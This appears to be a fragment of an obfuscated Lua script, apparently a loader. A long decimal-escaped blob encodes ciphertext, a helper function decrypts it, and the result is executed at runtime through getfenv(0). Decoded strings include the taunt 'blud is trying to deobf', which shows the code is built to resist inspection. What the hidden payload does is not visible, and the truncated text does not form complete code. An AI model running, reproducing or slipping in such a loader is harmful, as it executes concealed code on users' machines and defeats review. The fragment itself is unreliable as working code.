67\88\121\54\71\71\86\79\81\85\80\107\99\83\102\81\114\110\122\111\51\118\102\86\117\65\52\77\84\78\43\108\80\80\65\114\47\81\89\107\81\110\49\98\115\73\115\67\85\54\86\111\87\89\100\78\102\76\107\114\101\97\70\122\47\105\68\88\119\104\105\122\82\105\74\119\108\118\101\72\120\43\105\48\51\68\113\97\49\65\47\51\86\113\97\112\47\48\113\100\75\110\56\116\65\72\78\122\89\56\79\121\120\77\53\73\104\82\78\43\110\75\116\117\120\82\111\85\87\102\66\89\105\51\47\104\48\112\73\81\119\105\115\114\55\107\67\81\104\120\79\78\87\80\115\105\119\118\55\113\114\69\114\84\88\120\85\107\102\98\121\88\48\105\83\107\106\85\51\84\107\49\66\82\117\80\119\108\111\113\118\119\66\117\68\83\119\65\57\116\120\115\99\119\98\118\51\80\50\106\49\47\119\73\51\81\84\104\72\72\70\65\67\110\69\112\51\47\115\78\106\77\66\52\101\47\116\113\112\83\87\66\121\49\119\101\51\79\114\87\90\121\108\79\74\112\75\119\104\72\101\69\74\65\70\110\117\103\90\90\84\88\121\56\71\98\85\56\47\67\69\89\98\47\56\71\72\119\49\67\47\73\98\102\112\109\80\85\66\90\120\85\55\101\49\66\84\51\54\89\118\101\105\53\78\65\85\109\112\76\103\68\89\73\47\57\83\52\90\80\68\56\101\116\100\43\84\87\68\79\111\54\103\121\57\72\109\111\77\114\48\48\73\81\75\75\114\78\110\82\97\108\65\80\80\76\107\86\98\56\102\43\121\78\48\111\113\116\113\97\51\78\122\43\103\103\57\48\77\56\51\112\113\76\66\114\119\115\83\51\83\83\118\120\98\78\98\103\120\66\101\86\53\105\102\121\65\55\122\112\110\55\55\109\119\69\73\49\102\117\71\52\105\76\83\52\120\50\54\69\100\122\102\114\51\87\116\71\112\110\70\66\117\78\111\53\65\107\70\86\48\109\53\97\86\82\50\122\73\98\56\49\102\57\54\50\103\68\117\104\105\111\120\72\52\90\67\76\53\84\74\54\108\72\106\100\47\69\117\107\69\113\65\66\79\67\79\101\100\53\47\119\90\51\67\115\111\99\66\79\98\112\56\78\77\65\70\86\100\73\110\108\88\56\118\85\85\118\66\70\100\113\111\106\120\56\89\107\104\53\48\47\90\70\105\99\43\74\118\98\119\69\112\97\97\120\65\66\72\104\109\117\111\65\103\104\52\67\71\49\111\48\66\48\112\103\118\80\74\50\111\83\109\66\66\110\103\53\49\85\86\79\109\73\43\116\53\107\90\111\78\90\87\89\70\100\80\69\101\65\115\82\116\101\52\77\118\117\119\122\49\99\57\107\122\109\56\78\77\50\52\48\100\73\50\65\78\110\82\103\49\77\71\122\116\90\56\101\74\50\68\47\110\76\83\87\71\72\53\86\50\110\75\70\110\75\105\54\77\76\77\51\119\120\109\107\118\112\97\85\115\122\115\71\51\56\118\66\76\98\56\103\47\118\69\100\121\49\80\47\80\70\116\57\115\66\82\122\47\43\100\83\68\115\99\57\88\120\71\98\79\118\100\87\98\67\57\105\77\68\99\108\105\86\89\113\57\84\82\112\70\114\75\102\116\87\107\112\75\49\88\122\99\99\99\68\119\67\101\119\97\73\67\66\90\85\71\84\43\86\73\56\78\87\97\116\99\106\51\49\105\116\72\72\49\53\83\107\71\116\51\73\121\47\48\101\76\104\68\47\77\75\97\69\68\69\102\84\103\87\98\73\71\85\55\53\105\55\113\76\88\52\68\80\54\66\107\113\68\79\67\88\113\97\90\116\70\117\50\71\69\71\73\55\71\117\48\100\99\49\81\102\88\105\115\83\81\114\99\77\120\82\110\97\82\70\65\47\84\78\115\76\113\89\51\48\68\112\112\77\115\56\78\47\120\47\83\65\88\77\87\72\75\86\75\117\57\85\118\65\47\90\87\101\109\83\73\102\90\85\43\51\113\90\85\98\102\109\85\117\69\67\119\82\56\111\87\101\101\108\55\104\84\106\78\103\81\103\84\77\81\85\69\74\56\102\57\86\119\87\112\111\57\79\78\117\56\50\76\117\118\87\79\101\80\49\54\100\43\102\110\103\48\73\98\90\98\121\68\77\75\79\113\71\49\106\119\72\47\55\87\70\69\106\84\81\109\87\119\111\51\71\104\117\109\48\121\86\48\48\84\116\65\71\80\97\121\51\74\113\71\102\122\111\66\122\117\72\118\52\71\83\66\113\74\108\66\109\78\104\106\70\69\71\83\65\79\106\110\111\77\107\103\82\84\109\55\79\52\119\49\104\79\89\74\72\81\119\115\86\84\116\57\98\53\111\79\82\66\55\68\48\99\76\54\83\86\90\79\117\88\69\74\80\65\52\122\78\104\79\67\119\68\52\115\115\116\66\121\73\75\70\51\97\43\99\78\43\56\99\90\77\79\118\70\51\66\116\73\102\68\50\55\54\50\100\54\116\104\89\101\77\110\76\120\81\107\122\101\98\100\77\56\80\119\84\48\107\111\84\55\76\52\54\75\57\100\48\57\67\52\81\121\47\100\113\73\73\52\73\107\73\105\87\87\66\72\47\79\69\81\114\98\68\50\97\105\85\85\89\73\67\113\86\67\122\56\98\109\57\75\107\102\118\98\71\88\84\82\104\101\99\116\105\115\68\70\97\78\104\48\122\50\116\55\87\66\52\48\43\71\52\100\90\85\43\57\103\99\82\102\68\48\47\79\106\108\54\115\87\115\50\70\116\86\75\97\48\48\103\104\79\103\54\78\69\122\102\122\65\52\75\65\88\73\102\66\74\118\85\50\56\47\116\76\104\103\103\76\65\122\102\120\119\104\65\48\48\103\79\72\49\72\66\113\66\101\121\74\72\99\99\110\88\104\102\87\105\49\53\99\115\75\82\103\121\89\112\113\86\103\120\78\49\109\82\113\77\82\74\71\55\88\107\52\68\47\68\69\51\103\73\90\76\80\56\102\110\104\90\66\67\51\119\115\70\71\120\112\116\66\117\67\99\109\73\69\75\119\101\117\106\77\87\117\73\87\85\69\120\104\117\79\107\56\48\69\74\72\113\111\97\103\78\65\113\86\118\110\72\79\98\90\86\86\66\77\43\51\118\72\56\75\49\102\57\78\88\49\109\120\51\69\103\114\49\107\66\111\77\81\114\66\83\119\54\47\107\76\97\90\111\120\78\80\105\89\119\85\85\75\48\102\107\85\122\81\102\65\77\88\50\53\73\85\97\82\52\57\66\116\122\100\89\82\86\74\84\87\85\103\113\108\97\102\102\106\53\87\121\101\107\97\105\116\89\54\47\106\50\103\77\80\52\118\103\67\67\85\68\83\115\99\122\49\85\54\50\118\69\111\82\70\75\78\122\87\80\90\88\111\112\74\100\71\99\107\100\102\113\73\73\52\119\115\82\76\67\80\99\43\71\99\103\49\98\68\116\53\115\110\107\102\117\79\114\80\81\110\68\83\109\122\74\90\55\57\114\108\54\48\122\120\75\100\117\88\114\80\103\48\98\73\85\87\85\114\106\98\106\65\72\71\70\112\120\109\49\105\90\57\115\98\89\65\87\73\80\76\76\121\112\102\72\52\75\73\112\112\101\75\89\112\72\122\74\99\120\87\68\77\86\67\73\103\57\114\122\65\75\112\89\105\97\86\108\54\77\80\113\111\111\49\98\76\107\79\71\79\82\108\48\116\57\65\109\90\110\102\69\87\118\81\98\80\84\82\49\76\120\66\68\65\50\53\81\81\70\120\47\86\99\74\89\109\82\67\82\71\110\67\111\121\69\80\118\69\115\81\82\101\71\113\111\86\77\49\83\108\108\54\99\70\75\108\99\80\78\66\112\75\97\56\106\66\80\48\122\104\67\77\86\105\115\70\122\105\57\77\103\117\85\73\80\50\103\117\53\86\116\113\110\85\107\76\88\43\90\56\90\115\88\69\112\115\73\115\69\83\86\88\90\79\109\47\49\77\103\48\111\87\87\54\112\56\68\49\51\110\68\85\52\55\116\54\103\104\118\109\122\102\72\117\79\118\53\98\122\109\47\80\120\109\73\103\75\83\115\100\114\47\108\114\83\68\67\80\90\80\67\55\116\73\107\54\98\71\88\99\97\105\109\116\113\114\53\117\50\78\85\89\76\73\77\101\50\50\121\114\90\100\65\88\54\109\121\56\119\119\88\71\104\69\76\107\86\86\122\74\80\75\73\79\100\43\106\97\103\65\122\109\77\114\121\51\77\82\108\84\85\103\101\100\86\106\113\77\81\102\55\65\50\71\112\50\76\106\73\66\103\115\47\52\67\72\71\118\112\74\86\50\51\106\112\97\82\111\89\107\107\108\83\118\112\121\97\100\101\114\54\121\56\115\85\115\51\70\112\47\107\120\105\121\72\78\106\72\112\80\81\88\67\47\107\76\76\105\104\122\49\120\85\85\89\97\52\57\116\80\67\116\53\100\120\99\81\66\76\117\86\122\117\89\85\49\84\49\100\56\116\112\56\51\110\108\122\72\99\97\107\43\104\100\54\83\49\84\85\47\83\108\65\43\53\70\99\89\48\47\85\68\48\118\55\65\90\111\113\65\88\90\89\77\117\43\56\122\87\75\51\107\43\122\116\90\81\49\115\43\98\86\85\84\84\67\53\111\109\114\109\55\69\53\112\108\65\84\120\122\106\118\107\107\88\52\118\88\74\100\107\113\90\49\85\83\102\117\108\108\57\107\85\77\110\43\77\50\108\65\84\108\115\73\66\77\102\98\98\101\85\72\103\79\82\110\104\88\80\69\76\74\88\85\82\82\111\88\106\55\56\53\69\55\110\121\99\90\114\43\120\90\48\122\105\49\50\102\86\52\56\67\57\57\89\87\117\115\50\105\111\74\54\83\51\57\66\67\117\90\88\65\71\71\113\53\77\83\72\103\118\88\47\72\99\109\77\83\43\105\48\47\103\68\51\73\100\75\97\66\89\117\67\114\89\72\101\49\53\112\103\50\78\43\49\57\66\43\75\48\70\54\121\81\69\99\116\104\120\112\66\113\114\108\56\70\79\118\104\88\74\104\115\82\76\74\85\49\121\49\50\121\54\112\122\49\69\80\50\84\117\99\106\103\54\69\68\49\55\73\53\114\90\74\47\115\73\116\48\107\120\80\110\49\115\116\106\115\118\76\116\57\71\73\119\107\51\69\65\111\111\49\117\49\77\52\98\87\43\47\100\51\116\77\118\100\73\116\78\83\43\74\103\116\117\116\109\71\65\103\110\99\101\78\107\73\66\49\83\80\119\113\90\67\55\66\55\79\117\102\81\120\70\48\108\108\100\80\98\100\117\66\49\54\80\105\119\84\105\69\54\43\90\112\99\110\47\97\110\54\72\65\51\87\106\114\105\97\97\115\55\111\118\79\106\71\73\84\82\66\75\52\68\72\53\102\66\69\106\100\86\107\120\66\67\117\65\68\47\78\56\66\120\55\115\108\84\80\118\101\69\121\68\121\114\70\114\115\90\51\83\105\85\77\52\112\112\98\115\105\106\104\104\73\108\103\70\81\116\57\98\101\97\54\65\76\103\47\120\75\72\83\73\121\88\115\106\104\84\100\114\113\121\104\108\119\66\101\98\116\88\53\103\107\85\115\89\87\67\78\122\101\48\80\78\106\89\47\82\115\80\68\112\74\76\98\81\82\43\99\79\56\118\101\65\113\82\89\113\103\88\43\120\118\110\68\86\79\84\89\68\52\98\113\103\107\87\97\72\110\48\119\57\51\109\55\88\77\67\97\66\113\114\108\65\83\121\104\85\99\56\90\108\57\52\54\118\70\54\120\120\101\73\79\107\67\81\107\70\82\106\102\107\118\47\117\67\89\81\55\99\48\65\98\71\120\114\98\117\79\76\65\106\116\48\86\99\89\86\87\71\102\77\74\54\82\48\69\56\103\85\105\103\70\89\105\82\105\103\68\66\90\49\98\110\77\51\52\72\115\75\57\110\82\116\53\65\89\51\88\116\65\78\49\118\121\85\116\43\51\57\101\56\117\116\118\54\69\111\109\75\102\111\51\117\79\80\89\79\43\111\118\54\118\116\72\108\119\51\88\103\100\47\111\47\100\77\53\82\53\88\79\116\47\84\70\76\88\90\83\88\65\100\109\84\119\116\84\116\108\66\114\117\47\52\75\104\83\56\89\110\105\73\73\79\89\48\47\52\104\81\117\90\52\88\67\55\82\87\56\55\103\48\70\67\100\55\70\119\102\120\106\77\51\115\50\49\89\115\119\100\99\99\65\110\56\66\78\87\69\90\47\104\107\117\70\74\86\82\108\120\47\97\106\81\85\110\73\72\100\104\43\120\119\84\85\122\76\47\101\70\72\71\100\111\69\69\82\69\77\85\105\114\77\84\106\84\79\102\47\71\51\66\54\120\104\74\65\83\121\75\117\72\54\55\81\43\49\70\54\117\48\65\113\103\116\75\98\51\56\110\56\109\110\101\112\51\76\109\79\68\101\106\75\81\81\114\79\117\122\57\56\118\71\110\107\97\68\48\68\68\81\56\56\80\85\108\82\57\82\109\49\87\108\85\110\108\50\50\65\118\53\109\78\55\116\68\87\122\70\122\53\82\97\69\102\99\87\67\81\101\56\103\66\74\112\75\47\87\103\115\53\68\80\70\57\51\102\116\105\115\66\115\78\65\103\89\43\54\90\86\69\83\97\109\53\79\75\70\73\43\122\48\116\48"local e='cGdGMyktdmIsIzp7eE5xViI='local e='\98\108\117\100\32\105\115\32\116\114\121\105\110\103\32\116\111\32\100\101\111\98\102'local b=function(c,d)local b=b(a(c))local b=b["\99\105\112\104\101\114"](b,a(d))return a(b)end;local e='\98\108\117\100\32\105\115\32\116\114\121\105\110\103\32\116\111\32\100\101\111\98\102'local e='\101\108\73\57\77\88\78\110\76\49\115\108\85\81\61\61'local f='QHZiQkloTlA+cEtBQWl3MDMzUA=='local g='Oz8/NGtZYjtDaUkrRkErWloyOyNzUyVycTolSjNqJDQwaE4=bi12PyZmUDh0RiF1'function misp_is_betterlIIlIlll(b,c)local a=a(b,c)local b=f;return a,b end;return c(b(e,d),getfenv(0))()end)()
